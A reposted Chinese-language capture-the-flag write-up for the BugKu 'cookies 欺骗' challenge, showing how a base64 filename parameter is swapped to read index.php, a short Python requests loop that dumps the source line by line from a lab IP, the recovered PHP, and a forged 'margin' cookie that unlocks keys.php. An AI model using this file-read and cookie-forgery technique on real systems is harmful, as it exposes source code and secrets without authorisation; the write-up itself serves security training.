BugKu:cookies 欺骗
生活随笔
收集整理的這篇文章主要介紹了
BugKu:cookies 欺骗
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
查看源碼后沒有可用信息
觀察url發(fā)現(xiàn)參數(shù)filename的值加密了
解密后filename=keys.txt
嘗試用修改參數(shù)filename的值為index.php(注意此處index.php要用base64加密為aW5kZXgucGhw)
發(fā)現(xiàn)參數(shù)line沒有給值,隨意賦值如3,出現(xiàn)
寫腳本抓原代碼,先試一下有多少行,100,50,25,20都無回顯,大約定在30
import requests a=30 for i in range(a):url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"s=requests.get(url)print (s.text)讀取的源碼:
<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>分析源代碼,當cookie的margin=margin時,可以訪問一個keys.php文件
注意把參數(shù)filename的值改為base64加密后的keys.php
總結(jié)
以上是生活随笔為你收集整理的BugKu:cookies 欺骗的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: bugku 成绩单 sqlmap工具的
- 下一篇: c易错题